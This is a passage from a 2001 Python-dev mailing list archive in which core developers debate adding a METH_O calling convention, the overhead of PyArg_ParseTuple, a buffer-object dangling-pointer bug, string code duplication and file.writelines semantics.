demonstrated with the array module - if you get > a pointer to the buffer interface for an array object, but the array then > resizes itself, the buffer pointer dangles. I guess there are three ways to "solve" this: a) mutable types don't implement the getreadbuf interface b) the getreadbuf interface is complemented with a callback interface, so the the buffer object can be notified of the change c) calling getreadbuf on a mutable object causes this object to become immutable -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jeremy@digicool.com Sun May 27 19:51:26 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Sun, 27 May 2001 14:51:26 -0400 (EDT) Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> Message-ID: <15121.19630.329909.482775@slothrop.digicool.com> >>>>> "MvL" == Martin v Loewis writes: MvL> to the existing approach. The main point of this patch is to MvL> improve efficiency, and (according to Jeremy's analysis), most MvL> of the time for calling a function is spend in MvL> PyArg_ParseTuple. I'd like to qualify this a bit. What I reported earlier is that the BuiltinFuntionCall microbenchmark in pybench spends 30% of its time in PyArg_ParseTuple(). This strikes me as excessive, because it's a static property of the code. (One could imagine writing a Python script that parsed the "O!|is#" format strings and generated efficient, specialized C code for that format.) If we benchmark other programs, particularly those that do more work in the builtins, the relative cost of the argument processing will be lower. Jeremy From jeremy@digicool.com Sun May 27 19:55:36 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Sun, 27 May 2001 14:55:36 -0400 (EDT) Subject: [Python-Dev] Special-casing "O" In-Reply-To: References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: <15121.19880.775931.946049@slothrop.digicool.com> >>>>> "TP" == Tim Peters writes: TP> Do METH_O, convert every "O" function to use it, declare TP> victory, and enjoy the weekend . TP> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- TP> size-ly y'rs - tim How is METH_O different than METH_OLDARGS? The old-style argument passing is definitely the most efficient for functions of a zero or one arguments. There's special-case code in ceval to support it these cases -- fast_cfunction() -- primarily because in these cases the function can be invoked by using arguments directly from the Python stack instead of copying them to a tuple first. Jeremy From tim.one@home.com Sun May 27 21:37:43 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 27 May 2001 16:37:43 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <15121.19880.775931.946049@slothrop.digicool.com> Message-ID: [Jeremy] > How is METH_O different than METH_OLDARGS? I have no idea: can you explain it? The #define's for these symbols are uncommented, and it's a mystery to me what they're *supposed* to mean. > The old-style argument passing is definitely the most efficient for > functions of a zero or one arguments. There's special-case code in > ceval to support it these cases -- fast_cfunction() -- primarily > because in these cases the function can be invoked by using arguments > directly from the Python stack instead of copying them to a tuple > first. OK, I'm looking in bltinmodule.c, at builtin_len. It starts like so: static PyObject * builtin_len(PyObject *self, PyObject *args) { PyObject *v; long res; if (!PyArg_ParseTuple(args, "O:len", &v)) return NULL; So it's clearly expecting a tuple. But its entry in the builtin_methods[] table is: {"len", builtin_len, 1, len_doc}, That is, it says nothing about the calling convention. Since C fills in a 0 for missing values, and methodobject.c has /* Flag passed to newmethodobject */ #define METH_OLDARGS 0x0000 #define METH_VARARGS 0x0001 #define METH_KEYWORDS 0x0002 then doesn't the stuct for builtin_len implicitly specify METH_OLDARGS? But if that's true, and fast_cfunction() does not create a tuple in this case, how is that builtin_len gets a tuple? Something doesn't add up here. Or does it? There's no *reference* to METH_OLDARGS anywhere in the code base other than its definition and its use in method tables, so whatever code *keys* off it must be assuming a hardcoded 0 value for it -- or indeed nothing keys off it at all. I expect this line in ceval.c is doing the dirty assumption: } else if (flags == 0) { and should be testing against METH_OLDARGS instead. But I see that builtin_len is falling into the METH_VARARGS case despite that it wasn't declared that way and that it sure looks like METH_OLDARGS (0) is the default. Confusing! Fix it . From tim.one@home.com Sun May 27 21:46:29 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 27 May 2001 16:46:29 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: Message-ID: [Tim, thrashing] > ... > So it's clearly expecting a tuple. But its entry in the builtin_methods[] > table is: > > {"len", builtin_len, 1, len_doc}, > > That is, it says nothing about the calling convention. Oops, it does, using a hardcoded 1 instead of the METH_VARARGS #define. So that explains that. Next question: why isn't builtin_len using METH_OLDARGS instead? Is there some advantage to using METH_VARARGS in this case? This gets back to what these #defines are intended to *mean*, and I still haven't figured that out. From mwh@python.net Sun May 27 22:32:48 2001 From: mwh@python.net (Michael Hudson) Date: Sun, 27 May 2001 22:32:48 +0100 (BST) Subject: [Python-Dev] Special-casing "O" In-Reply-To: Message-ID: On Sun, 27 May 2001, Tim Peters wrote: > Next question: why isn't builtin_len using METH_OLDARGS instead? Is > there some advantage to using METH_VARARGS in this case? So you can't do >>> len(1,2) 2 a la list.append, socket.connect pre 2.0? (or was it 1.6?) My imprssion is that generally METH_VARARGS is saner than METH_OLDARGS (ie. more consistent). It seems the proposed METH_O is basically METH_OLDARGS + the restriction that there is in fact only one argument, so we save a tuple allocation over METH_VARARGS, but get argument count checking over METH_OLDARGS. Cheers, M. From tim.one@home.com Sun May 27 23:49:38 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 27 May 2001 18:49:38 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: Message-ID: [Tim] > Next question: why isn't builtin_len using METH_OLDARGS instead? Is > there some advantage to using METH_VARARGS in this case? [Michael Hudson] > So you can't do > > >>> len(1,2) > 2 > > a la list.append, socket.connect pre 2.0? (or was it 1.6?) If I didn't know better, I'd suspect Python's internal calling conventions at the start didn't perfectly anticipate all future developements. Among other things, looks like it's impossible for a METH_OLDARGS function to distinguish between being called with more than one argument and being called with a single tuple argument. > My imprssion is that generally METH_VARARGS is saner than METH_OLDARGS > (ie. more consistent). Yes, METH_OLDARGS does appear to, well, suck. > It seems the proposed METH_O is basically METH_OLDARGS + the > restriction that there is in fact only one argument, so we save > a tuple allocation over METH_VARARGS, Also, and more importantly, save the PyArg_ParseTuple call on the receiving end. > but get argument count checking over METH_OLDARGS. Which is worth getting. I'm back to where I started here: Do METH_O, convert every "O" function to use it, declare victory, and enjoy the weekend. 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- size-ly y'rs - tim PS: But today I'll add another: add at least one comment to the code -- this stuff is a bitch to reverse-engineer. From thomas@xs4all.net Sun May 27 23:50:58 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Mon, 28 May 2001 00:50:58 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: ; from mwh@python.net on Sun, May 27, 2001 at 10:32:48PM +0100 References: Message-ID: <20010528005058.H690@xs4all.nl> On Sun, May 27, 2001 at 10:32:48PM +0100, Michael Hudson wrote: > On Sun, 27 May 2001, Tim Peters wrote: > > Next question: why isn't builtin_len using METH_OLDARGS instead? Is > > there some advantage to using METH_VARARGS in this case? > So you can't do > >>> len(1,2) > 2 > a la list.append, socket.connect pre 2.0? (or was it 1.6?) And don't forget the method-specific errormessage by passing ':len' in the format string. Of course, this can easily be (and probably should) done by passing another argument to whatever parses arguments in METH_O, rather than invoking string parsing magic every call. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From thomas@xs4all.net Sun May 27 23:58:30 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Mon, 28 May 2001 00:58:30 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: ; from tim.one@home.com on Sun, May 27, 2001 at 06:49:38PM -0400 References: Message-ID: <20010528005830.I690@xs4all.nl> On Sun, May 27, 2001 at 06:49:38PM -0400, Tim Peters wrote: > 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- > size-ly y'rs - tim And recycle a quote a day ;) > PS: But today I'll add another: add at least one comment to the code -- > this stuff is a bitch to reverse-engineer. But not just any comment, please! The Pine sourcecode is riddled with calls to 'mm_critical(stream)', and each call I've seen so far is nicely commented with the utterly useless comment '/* go critical */'. I'd-gladly-trade-in-every-mm_critical-comment-for-one-comment-to-describe- -what-Pine-actually-tries-to-do-ly y'rs, -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From martin@loewis.home.cs.tu-berlin.de Sun May 27 23:45:53 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 28 May 2001 00:45:53 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <15121.19630.329909.482775@slothrop.digicool.com> (message from Jeremy Hylton on Sun, 27 May 2001 14:51:26 -0400 (EDT)) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> <15121.19630.329909.482775@slothrop.digicool.com> Message-ID: <200105272245.f4RMjru01021@mira.informatik.hu-berlin.de> > I'd like to qualify this a bit. What I reported earlier is that the > BuiltinFuntionCall microbenchmark in pybench spends 30% of its time in > PyArg_ParseTuple(). This strikes me as excessive, because it's a > static property of the code. (One could imagine writing a Python > script that parsed the "O!|is#" format strings and generated > efficient, specialized C code for that format.) > > If we benchmark other programs, particularly those that do more work > in the builtins, the relative cost of the argument processing will be > lower. Certainly: If the work inside the function increases, the overhead of calling it will be less visible. What the benchmark shows, however, and what my patch addresses, is that the time for *calling* a function is primarily spent in PyArg_ParseTuple (and not in, say, building argument tuples, putting parameters on the stack, fetching function addresses, building method objects, and so on). Regards, Martin From tim.one@home.com Mon May 28 00:17:27 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 27 May 2001 19:17:27 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <20010528005058.H690@xs4all.nl> Message-ID: [Thomas Wouters] > And don't forget the method-specific errormessage by passing ':len' in > the format string. Of course, this can easily be (and probably should) > done by passing another argument to whatever parses arguments in > METH_O, rather than invoking string parsing magic every call. Martin's patch automatically inserts the name of the function in the TypeError it raises when a METH_O call doesn't get exactly one argument, or gets a (one or more) keyword argument. Stick to METH_O and it's a clear win, even in this respect: there's no info in an explicit ":len" he's not already deducing, and almost all instances of "O:name" formats today are exactly the same this way: if (!PyArg_ParseTuple(args, "O:abs", &v)) if (!PyArg_ParseTuple(args, "O:callable", &v)) if (!PyArg_ParseTuple(args, "O:id", &v)) if (!PyArg_ParseTuple(args, "O:hash", &v)) if (!PyArg_ParseTuple(args, "O:hex", &v)) if (!PyArg_ParseTuple(args, "O:float", &v)) if (!PyArg_ParseTuple(args, "O:len", &v)) if (!PyArg_ParseTuple(args, "O:list", &v)) else if (!PyArg_ParseTuple(args, "O:min/max", &v)) if (!PyArg_ParseTuple(args, "O:oct", &v)) if (!PyArg_ParseTuple(args, "O:ord", &obj)) if (!PyArg_ParseTuple(args, "O:reload", &v)) if (!PyArg_ParseTuple(args, "O:repr", &v)) if (!PyArg_ParseTuple(args, "O:str", &v)) if (!PyArg_ParseTuple(args, "O:tuple", &v)) if (!PyArg_ParseTuple(args, "O:type", &v)) Those are all the ones in bltinmodule.c, and nearly all of them are called extremely frequently in *some* programs. The only oddball is min/max, but then it supports more than one call-list format and so isn't a METH_O candidate anyway. Indeed, Martin's patch gives a *better* message than we get for some mistakes today: >>> len(val=2) Yraceback (most recent call last): File "", line 1, in ? TypeError: len() takes exactly 1 argument (0 given) >>> Martin's would say TypeError: len takes no keyword arguments in this case. He should add "()" after the function name. He should also throw away the half of the patch complicating and slowing METH_O to get some theoretical speedup in other cases: make the one-arg builtins fly just as fast as humanly possible. From greg@cosc.canterbury.ac.nz Mon May 28 01:23:55 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Mon, 28 May 2001 12:23:55 +1200 (NZST) Subject: [Python-Dev] strop vs. string In-Reply-To: Message-ID: <200105280023.MAA00996@s454.cosc.canterbury.ac.nz> > However, it has one fatal flaw, and no one seems > to know what to do about it. I think it would be safe if: 1) it kept a reference to the underlying object, and 2) it re-fetched the pointer and length info each time it was needed, using the underlying object's buffer interface. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Mon May 28 01:28:41 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Mon, 28 May 2001 12:28:41 +1200 (NZST) Subject: [Python-Dev] strop vs. string In-Reply-To: <20010525132752.B5402@lyra.org> Message-ID: <200105280028.MAA01000@s454.cosc.canterbury.ac.nz> Greg Stein > "badly" is overstating the problem. It caches a pointer when it shouldn't. > This doesn't work well But "doesn't work well" means "can crash the interpreter". I don't think "badly" is an overstatement here... Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From tim.one@home.com Mon May 28 02:42:30 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 27 May 2001 21:42:30 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B10D758.3741AC2F@lemburg.com> Message-ID: [MAL] > I guess there are three ways to "solve" this: > > a) mutable types don't implement the getreadbuf interface Of the few types that implement it today, that would leave only strings (8-bit and Unicode). Too much machinery just for that. Besides, I once posted an example to c.l.py showing how to use regexps to search mmap'ed files, so *that* must continue to work forever . > b) the getreadbuf interface is complemented with a callback > interface, so the the buffer object can be notified of > the change I like this best, although there's no bound on the number of buffers that may need to be notified in case of change (i.e., the object would need to maintain a list of buffers to be notified). > c) calling getreadbuf on a mutable object causes this object > to become immutable Even easier, core dump as soon as getreadbuf is called . [Greg Ewing] > I think it would be safe if: > > 1) it kept a reference to the underlying object, and That much it already does. > 2) it re-fetched the pointer and length info each time it was > needed, using the underlying object's buffer interface. If after b = buffer(some_object) b.__getitem__ needed to refetch the info between b[i] and b[i+1] I expect it would be so slow even Greg wouldn't want it anymore. From tim.one@home.com Mon May 28 02:52:18 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 27 May 2001 21:52:18 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0FD023.C4588919@lemburg.com> Message-ID: [Tim] > About combining strop and buffers and strings, don't forget > unicodeobject.c: that's got oodles of basically duplicate code too. > /F suggested dealing with the minor differences via maintaining one > code file that gets compiled multiple times w/ appropriate #defines. [MAL] > Hmm, that only saves us a few kB in source, but certainly not > in the object files. That's not the point. Manually duplicated code blocks always get out of synch, as people fix bugs in, or enhance, one of them but don't even know about the others. /F brought this up after I pissed away a few hours trying to repair one of these in all places, and he noted that strop.replace() and string.replace() are woefully inefficient anyway. > The better idea would be making the types subclass from a generic > abstract string object -- I just don't know how this will be > possible with Guido's type patches. We'll just have to wait, > I guess. Wait for what? If it were possible, is the chance that you'd take time to rework unicodeobject.c to "subclass from a generic abstract string object" greater than 0? The chance that I would is exactly 0. From martin@loewis.home.cs.tu-berlin.de Mon May 28 07:36:49 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 28 May 2001 08:36:49 +0200 Subject: [Python-Dev] Special-casing "O" Message-ID: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> > How is METH_O different than METH_OLDARGS? METH_O will raise an exception if the function is called with more than one argument, without calling the function. METH_OLDARGS will pass a tuple in this case. I believe you cannot distinguish between a single tuple argument and an invocation with multiple arguments in a METH_OLDARGS function, is that true? Regards, Martin From martin@loewis.home.cs.tu-berlin.de Mon May 28 08:40:54 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 28 May 2001 09:40:54 +0200 Subject: [Python-Dev] file.writelines("foo\n","bar\n") Message-ID: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> When investigating calling conventions, I took a special look at METH_OLDARGS occurrences. While most of them look reasonable, file.writelines caught my attention. It has if (args == NULL || !PySequence_Check(args)) { PyErr_SetString(PyExc_TypeError, "writelines() argument must be a sequence of strings"); return NULL; } Because it is a METH_OLDARGS method, you can do f=open("/tmp/x","w") f.writelines("foo\n","bar\n") With my upcoming patches, I'd replace this with METH_O, making this call illegal. Does anybody see a problem with that change in semantics? Regards, Martin From thomas@xs4all.net Mon May 28 09:17:58 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Mon, 28 May 2001 10:17:58 +0200 Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 28, 2001 at 09:40:54AM +0200 References: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: <20010528101758.K690@xs4all.nl> On Mon, May 28, 2001 at 09:40:54AM +0200, Martin v. Loewis wrote: > When investigating calling conventions, I took a special look at > METH_OLDARGS occurrences. While most of them look reasonable, > file.writelines caught my attention. It has > if (args == NULL || !PySequence_Check(args)) { > PyErr_SetString(PyExc_TypeError, > "writelines() argument must be a sequence of strings"); > return NULL; > } > Because it is a METH_OLDARGS method, you can do > f=open("/tmp/x","w") > f.writelines("foo\n","bar\n") > With my upcoming patches, I'd replace this with METH_O, making this > call illegal. Does anybody see a problem with that change in > semantics? Hell yeah. About the same problem as with the 'l.append("foo", "bar")' problem in 1.5.2 -> [1.6, 2.x]. Oddly enough, this behaviour was added in 2.0, by converting a PyList_Check into a PySequence_Check: $ python1.5 >>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n") Traceback (innermost last): File "", line 1, in ? TypeError: writelines() requires list of strings $ python2.0 >>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n") >>> I do think we'll have to allow for this for one more release, with warnings and all. It's extremely unlikely that anyone is using this, but changing it without warning will definately not benifit 2.x's image wrt. stability ;P If bugfix-releases were allowed to generate additional warnings, I'd add a warning to 2.1.1.... -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal@lemburg.com Mon May 28 10:04:51 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Mon, 28 May 2001 11:04:51 +0200 Subject: [Python-Dev] strop vs. string References: Message-ID: <3B1214B3.9A4C295D@lemburg.com> Tim Peters wrote: > > [Tim] > > About combining strop and buffers and strings, don't forget > > unicodeobject.c: that's got oodles of basically duplicate code too. > > /F suggested dealing with the minor differences via maintaining one > > code file that gets compiled multiple times w/ appropriate #defines. > > [MAL] > > Hmm, that only saves us a few kB in source, but certainly not > > in the object files. > > That's not the point. Manually duplicated code blocks always get out of > synch, as people fix bugs in, or enhance, one of them but don't even know > about the others. /F brought this up after I pissed away a few hours trying > to repair one of these in all places, and he noted that strop.replace() and > string.replace() are woefully inefficient anyway. Ok, so what we'd need is a bunch of generic low-level string operations: one set for 8-bit and one for 16-bit code. Looking at unicodeobject.c it seems that the section "Helpers" would be a good start, plus perhaps a few bits from the method implementations refactored to form a low-level string template library. Perhaps we should move this code into a file stringhelpers.h which then gets included by stringobject.c and unicodeobject.c with appropriate #defines set up for 8-bit strings and for Unicode. > > The better idea would be making the types subclass from a generic > > abstract string object -- I just don't know how this will be > > possible with Guido's type patches. We'll just have to wait, > > I guess. > > Wait for what? If it were possible, is the chance that you'd take time to > rework unicodeobject.c to "subclass from a generic abstract string object" > greater than 0? The chance that I would is exactly 0. Well, that's hard to say. It would certainly be low-priority; same for the above refactoring. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Mon May 28 10:19:16 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Mon, 28 May 2001 11:19:16 +0200 Subject: [Python-Dev] Special-casing "O" References: Message-ID: <3B121814.E5E9896A@lemburg.com> Tim Peters wrote: > > [Thomas Wouters] > > And don't forget the method-specific errormessage by passing ':len' in > > the format string. Of course, this can easily be (and probably should) > > done by passing another argument to whatever parses arguments in > > METH_O, rather than invoking string parsing magic every call. > > Martin's patch automatically inserts the name of the function in the > TypeError it raises when a METH_O call doesn't get exactly one argument, or > gets a (one or more) keyword argument. > > Stick to METH_O and it's a clear win, even in this respect: there's no info > in an explicit ":len" he's not already deducing, and almost all instances of > "O:name" formats today are exactly the same this way: > > if (!PyArg_ParseTuple(args, "O:abs", &v)) > if (!PyArg_ParseTuple(args, "O:callable", &v)) > if (!PyArg_ParseTuple(args, "O:id", &v)) > if (!PyArg_ParseTuple(args, "O:hash", &v)) > if (!PyArg_ParseTuple(args, "O:hex", &v)) > if (!PyArg_ParseTuple(args, "O:float", &v)) > if (!PyArg_ParseTuple(args, "O:len", &v)) > if (!PyArg_ParseTuple(args, "O:list", &v)) > else if (!PyArg_ParseTuple(args, "O:min/max", &v)) > if (!PyArg_ParseTuple(args, "O:oct", &v)) > if (!PyArg_ParseTuple(args, "O:ord", &obj)) > if (!PyArg_ParseTuple(args, "O:reload", &v)) > if (!PyArg_ParseTuple(args, "O:repr", &v)) > if (!PyArg_ParseTuple(args, "O:str", &v)) > if (!PyArg_ParseTuple(args, "O:tuple", &v)) > if (!PyArg_ParseTuple(args, "O:type", &v)) > > Those are all the ones in bltinmodule.c, and nearly all of them are called > extremely frequently in *some* programs. The only oddball is min/max, but > then it supports more than one call-list format and so isn't a METH_O > candidate anyway. Indeed, Martin's patch gives a *better* message than we > get for some mistakes today: > > >>> len(val=2) > Yraceback (most recent call last): > File "", line 1, in ? > TypeError: len() takes exactly 1 argument (0 given) > >>> > > Martin's would say > > TypeError: len takes no keyword arguments > > in this case. He should add "()" after the function name. He should also > throw away the half of the patch complicating and slowing METH_O to get some > theoretical speedup in other cases: make the one-arg builtins fly just as > fast as humanly possible. If we end up only optimizing the re.match("O+") case, we wouldn't need the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick and Martin could call the underlying API with one or more PyObject* taken directly from the Python VM stack. In that case, please consider at least supporting "O", "OO" and "OOO" with optional arguments treated like I suggested in an earlier posting (simply pass NULL and let the API take care of assigning a default value). This would take care of most builtins: Python/bltinmodule.c: -- if (!PyArg_ParseTuple(args, "OO:filter", &func, &seq)) -- if (!PyArg_ParseTuple(args, "OO:cmp", &a, &b)) -- if (!PyArg_ParseTuple(args, "OO:coerce", &v, &w)) -- if (!PyArg_ParseTuple(args, "OO:divmod", &v, &w)) -- if (!PyArg_ParseTuple(args, "OO|O:getattr", &v, &name, &dflt)) -- if (!PyArg_ParseTuple(args, "OO:hasattr", &v, &name)) -- if (!PyArg_ParseTuple(args, "OOO:setattr", &v, &name, &value)) -- if (!PyArg_ParseTuple(args, "OO:delattr", &v, &name)) -- if (!PyArg_ParseTuple(args, "OO|O:pow", &v, &w, &z)) -- if (!PyArg_ParseTuple(args, "OO|O:reduce", &func, &seq, &result)) -- if (!PyArg_ParseTuple(args, "OO:isinstance", &inst, &cls)) -- if (!PyArg_ParseTuple(args, "OO:issubclass", &derived, &cls)) -- if (!PyArg_ParseTuple(args, "O:abs", &v)) -- if (!PyArg_ParseTuple(args, "O|OO:apply", &func, &alist, &kwdict)) -- if (!PyArg_ParseTuple(args, "O:callable", &v)) -- if (!PyArg_ParseTuple(args, "O|O:complex", &r, &i)) -- if (!PyArg_ParseTuple(args, "O:id", &v)) -- if (!PyArg_ParseTuple(args, "O:hash", &v)) -- if (!PyArg_ParseTuple(args, "O:hex", &v)) -- if (!PyArg_ParseTuple(args, "O:float", &v)) -- if (!PyArg_ParseTuple(args, "O|O:iter", &v, &w)) -- if (!PyArg_ParseTuple(args, "O:len", &v)) -- if (!PyArg_ParseTuple(args, "O:list", &v)) -- if (!PyArg_ParseTuple(args, "O|OO:slice", &start, &stop, &step)) -- else if (!PyArg_ParseTuple(args, "O:min/max", &v)) -- if (!PyArg_ParseTuple(args, "O:oct", &v)) -- if (!PyArg_ParseTuple(args, "O:ord", &obj)) -- if (!PyArg_ParseTuple(args, "O:reload", &v)) -- if (!PyArg_ParseTuple(args, "O:repr", &v)) -- if (!PyArg_ParseTuple(args, "O:str", &v)) -- if (!PyArg_ParseTuple(args, "O:tuple", &v)) -- if (!PyArg_ParseTuple(args, "O:type", &v)) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jeremy@digicool.com Mon May 28 17:45:27 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Mon, 28 May 2001 12:45:27 -0400 (EDT) Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> References: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> Message-ID: <15122.32935.53414.174221@slothrop.digicool.com> >>>>> "MvL" == Martin v Loewis writes: >> How is METH_O different than METH_OLDARGS? MvL> METH_O will raise an exception if the function is called with MvL> more than one argument, without calling the MvL> function. METH_OLDARGS will pass a tuple in this case. Yes, I see that now. I'm +1 on METH_O, then. Jeremy From tim.one@home.com Mon May 28 18:23:47 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 28 May 2001 13:23:47 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > I believe you cannot distinguish between a single tuple argument and > an invocation with multiple arguments in a METH_OLDARGS function, is > that true? That's the conclusion I reached after staring at the code.. From fdrake@acm.org Mon May 28 19:20:01 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Mon, 28 May 2001 14:20:01 -0400 (EDT) Subject: [Python-Dev] Removing doc/howto on python.org In-Reply-To: References: Message-ID: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com> Andrew Kuchling writes: > Looking at a bug report Fred forwarded, I realized that after > py-howto.sourceforge.net was set up, www.python.org/doc/howto was > never changed to redirect to the SF site instead. As of this > afternoon, that's now done; links on www.python.org have been updated, > and I've added the redirect. > > Question: is it worth blowing away the doc/howto/ tree now, or should > it just be left there, inaccessible, until work on www.python.org > resumes? Andrew, It looks like I never replied to this. It's probably dropped off your radar, but I'd say the answer is that the files on parrot should be discarded sooner rather than later -- when we actually manage to work on python.org we're that much more likely to have forgetten the redirection entirely! -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake@acm.org Mon May 28 19:33:13 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Mon, 28 May 2001 14:33:13 -0400 (EDT) Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <001c01c0aa95$55836f60$325821c0@newmexico> References: <200103112137.QAA13084@cj20424-a.reston1.va.home.com> <001c01c0aa95$55836f60$325821c0@newmexico> Message-ID: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Guido wrote: > Actually, I intend to deprecate locals(). For now, globals() are > fine. I also intend to deprecate vars(), at least in the form that is > equivalent to locals(). Samuele Pedroni writes: > That's fine for me. Will that deprecation be already active with 2.1, e.g > having locals() and param-less vars() raise a warning. > I imagine a (new) function that produce a snap-shot of the values in the > local,free and cell vars of a scope can do the job required for simple > debugging (the copy will not allow to modify back the values), > or another approach... Nothing has happened on this front yet. Should I add deprecation notes to the docummentation while Guido is on vacation, or wait to ask him when he gets back? Or was this matter resolved when I wasn't paying attention? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From tim.one@home.com Tue May 29 00:42:05 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 28 May 2001 19:42:05 -0400 Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Message-ID: [Guido] > Actually, I intend to deprecate locals(). For now, globals() are > fine. I also intend to deprecate vars(), at least in the form that is > equivalent to locals(). [Fred L. Drake, Jr.] > Nothing has happened on this front yet. Should I add deprecation > notes to the docummentation while Guido is on vacation, or wait to ask > him when he gets back? Or was this matter resolved when I wasn't > paying attention? I advise continuing to ignore it. Nothing was resolved, and to judge from a trial balloon I floated on c.l.py at the time, it's not a deprecation that will be greeted with enthusiasm. The problems range from people doing def f(...): ... print "..." % locals() to people mutating locals() at module level because they simply don't understand that globals() is the same (but correct) thing to use there. Due to the first example, and as Samuele may have already suggested, we at least need to implement a mapping object capturing name bindings before we can even think about deprecating locals() for real. From tim.one@home.com Tue May 29 01:01:33 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 28 May 2001 20:01:33 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B1214B3.9A4C295D@lemburg.com> Message-ID: [Tim] > Wait for what? If it were possible, is the chance that you'd > take time to rework unicodeobject.c to "subclass from a generic > abstract string object" greater than 0? The chance that I > would is exactly 0. [MAL] > Well, that's hard to say. It would certainly be low-priority; > same for the above refactoring. I think you must have missed this when it first came up here: /F suggested that *he* had a non-zero chance of implementing his suggestion. That makes it far closer to reality than anything that's been suggested since . From tim.one@home.com Tue May 29 01:42:54 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 28 May 2001 20:42:54 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B121814.E5E9896A@lemburg.com> Message-ID: [MAL] > If we end up only optimizing the re.match("O+") case, we 